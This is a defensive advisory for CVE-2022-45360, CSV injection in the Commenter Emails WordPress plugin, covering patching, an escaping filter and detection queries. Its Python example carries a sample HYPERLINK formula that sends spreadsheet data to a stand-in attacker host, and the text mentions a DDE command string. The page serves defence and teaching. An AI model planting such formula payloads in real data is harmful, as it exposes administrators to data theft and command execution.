CVE-2022-45360
📋 TL;DR
Versions 2.6.1 and earlier of the Commenter Emails plugin for WordPress write commenter data into their CSV export without neutralizing spreadsheet formula characters (CSV injection). An attacker who leaves a comment whose name or email field starts with =, +, - or @ plants a formula that runs when a site administrator downloads the export and opens it in Excel, LibreOffice Calc or a similar application; depending on the formula and the application's settings this can mean command execution on the administrator's workstation or exfiltration of the spreadsheet's contents. Any WordPress site running a vulnerable version of the plugin is affected.
💻 Affected Systems
- WordPress Commenter Emails plugin, versions 2.6.1 and earlier (fixed in 2.6.2)
📦 What is this software?
Commenter Emails by Coffee2code: a WordPress plugin that lists the email addresses of everyone who has commented on the site and lets administrators download that list as a CSV file. The export is the sink for this vulnerability, since it contains text supplied by commenters.
⚠️ Risk & Real-World Impact
Worst Case
Code execution on the workstation of the administrator who opens the export, via DDE or external-command formulas that a spreadsheet application runs after the user accepts its security prompts, or bulk exfiltration of the other cells (every commenter's name and address) through formulas that make outbound requests.
Likely Case
An administrator opens the export in a spreadsheet, dismisses the application's warning, and a planted formula leaks other rows of the file to an attacker-controlled host or tampers with the data. Since the payload has to be typed into a public comment form, the attacker needs no account on the site.
If Mitigated
Limited impact if the export is only consumed programmatically (a CSV parser treats "=cmd|..." as ordinary text), if cells are neutralized before being written, or if the spreadsheet application is configured not to evaluate external links and DDE.
🎯 Exploit Status
The attacker's own step is only to submit a comment whose author fields carry the formula. Exploitation then depends on a site administrator exporting the CSV, opening it in a spreadsheet application that evaluates formulas, and accepting any warning it shows; nothing executes on the WordPress server itself.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.6.2 or later
Vendor Advisory: https://patchstack.com/database/vulnerability/commenter-emails/wordpress-commenter-emails-plugin-2-6-1-csv-injection
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find the Commenter Emails plugin.
4. Click 'Update Now' if an update is offered.
5. Alternatively, download the latest version from the WordPress plugin repository and update manually.
🔧 Temporary Workarounds
Disable CSV export functionality
Temporarily disable the plugin's CSV export (or the plugin itself) until you can update; the vulnerable output path is the export file, not the web pages.
Output escaping filter
Neutralize CSV output by prefixing any field that starts with a formula or cell-break character (=, +, -, @, tab, carriage return) with a single quote, so spreadsheet applications store it as text. Add to the theme's functions.php or a small site plugin:

```php
// Hook name as given on this page; confirm it exists in your plugin version
// before relying on it.
add_filter( 'commenter_emails_csv_output', 'sanitize_csv_formulas' );
function sanitize_csv_formulas( $field ) {
    // Apply per field: ^ matches only the start of the string, so running this
    // over the whole export body would escape the first cell only.
    return preg_replace( '/^[=+\-@\t\r]/', "'$0", $field );
}
```
🧯 If You Can't Patch
- Disable or uninstall the Commenter Emails plugin entirely
- Restrict the export to the few administrators who need it, and tell them to open exports in a text editor or to import them into the spreadsheet with every column typed as Text rather than double-clicking the file
🔍 How to Verify
Check if Vulnerable:
In WordPress admin > Plugins > Installed Plugins, look for Commenter Emails; any version 2.6.1 or earlier is vulnerable.
Check Version:
wp plugin list --name=commenter-emails --field=version
Verify Fix Applied:
Verify plugin version is 2.6.2 or later in WordPress admin panel.
📡 Detection & Monitoring
Log Indicators:
- The payload enters through comment submissions (POST /wp-comments-post.php). Standard web access logs record the request but not the form fields, so on their own they only show who commented around the time a suspicious commenter record appeared
- WAF or application logs that do capture form fields: author or email values beginning with =, +, -, @ or a tab character
Network Indicators:
- Formula-based exfiltration fires only when the export is opened, so look for outbound connections from administrator workstations to unfamiliar hosts right after a spreadsheet application opened a Commenter Emails export
Database Check (the reliable indicator; wp_ is the default table prefix, adjust to yours):
wp db query "SELECT comment_ID, comment_author, comment_author_email FROM wp_comments WHERE comment_author REGEXP '^[=+@-]' OR comment_author_email REGEXP '^[=+@-]'"
SIEM Query (for WAF or application logs that record comment form fields; field names vary by product):
source="wordpress" AND http_method="POST" AND uri_path="/wp-comments-post.php" AND (form.author MATCHES "^[=+@-]" OR form.email MATCHES "^[=+@-]")
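The output filter under 🔧 Temporary Workarounds and the checks in this section rest on one rule: a CSV cell that begins with =, +, -, @, a tab or a carriage return is evaluated rather than displayed when the file is opened in a spreadsheet application. The Python below is an added example written for this page, not code from the Commenter Emails plugin or from the Patchstack advisory. It renders constructed commenter rows the way a naive export does (the vulnerable behaviour) and the way a hardened export does, and it audits a CSV export for planted cells, which is the same check the database query above performs on the live comments table. The record shape, sample rows and payload strings are all constructed for illustration.

```python
"""Added example for this advisory page, not code from the Commenter Emails
plugin or from the Patchstack write-up. Sample rows and payloads are
constructed; they are not taken from any real site or report."""
import csv
import io

# Leading characters that turn a CSV cell into a formula (or break out of
# the cell) when the file is opened in Excel, LibreOffice Calc and similar.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

# Constructed commenter records in the shape a commenter-emails export has:
# two ordinary commenters and two whose name field carries a payload.
SAMPLE_COMMENTERS = [
    {"name": "Alice Example", "email": "alice@example.org"},
    {"name": "Bob", "email": "bob@example.net"},
    # HYPERLINK-style exfiltration: ships a neighbouring cell to a remote host
    {"name": '=HYPERLINK("http://attacker.example/?"&A1,"click")',
     "email": "evil@example.com"},
    # Plain arithmetic; harmless, but proves the export is executable
    {"name": "-1+1", "email": "mallory@example.com"},
]


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would interpret this cell as a formula."""
    return cell.startswith(FORMULA_PREFIXES)


def neutralize(cell: str) -> str:
    """Output-side CSV escaping: prefix a formula-like cell with a single
    quote so the spreadsheet stores it as text. Quoting the cell and
    doubling embedded double quotes is left to csv.writer below. The
    apostrophe stays visible in the opened file; that is the accepted
    trade-off of this defence."""
    return "'" + cell if is_formula_like(cell) else cell


def export_csv(rows, harden: bool) -> str:
    """Render commenter rows as CSV text. harden=False mirrors a naive
    export that writes fields verbatim (the vulnerable behaviour);
    harden=True applies neutralize() to every field."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["name", "email"])
    for row in rows:
        fields = [row["name"], row["email"]]
        if harden:
            fields = [neutralize(f) for f in fields]
        writer.writerow(fields)
    return buf.getvalue()


def scan_export(csv_text: str):
    """Audit an existing export (or any CSV dump of the comments table) for
    cells a spreadsheet would execute. Returns (row, column, cell) tuples;
    row is 1-based and counts data rows, not the header."""
    reader = csv.reader(io.StringIO(csv_text))
    header = next(reader, None)
    if header is None:
        return []
    findings = []
    for rownum, fields in enumerate(reader, start=1):
        for column, cell in zip(header, fields):
            if is_formula_like(cell):
                findings.append((rownum, column, cell))
    return findings


if __name__ == "__main__":
    unsafe = export_csv(SAMPLE_COMMENTERS, harden=False)
    safe = export_csv(SAMPLE_COMMENTERS, harden=True)
    print("naive export:\n" + unsafe)
    print("hardened export:\n" + safe)
    print("planted cells in naive export:", scan_export(unsafe))
    print("planted cells in hardened export:", scan_export(safe))
```

Running the script shows the third and fourth rows of the naive export flagged and the hardened export clean. To audit a real download, read the file and pass its text to scan_export(); the apostrophe prefix is also why neutralized exports come back empty, since the first character is no longer one a spreadsheet acts on.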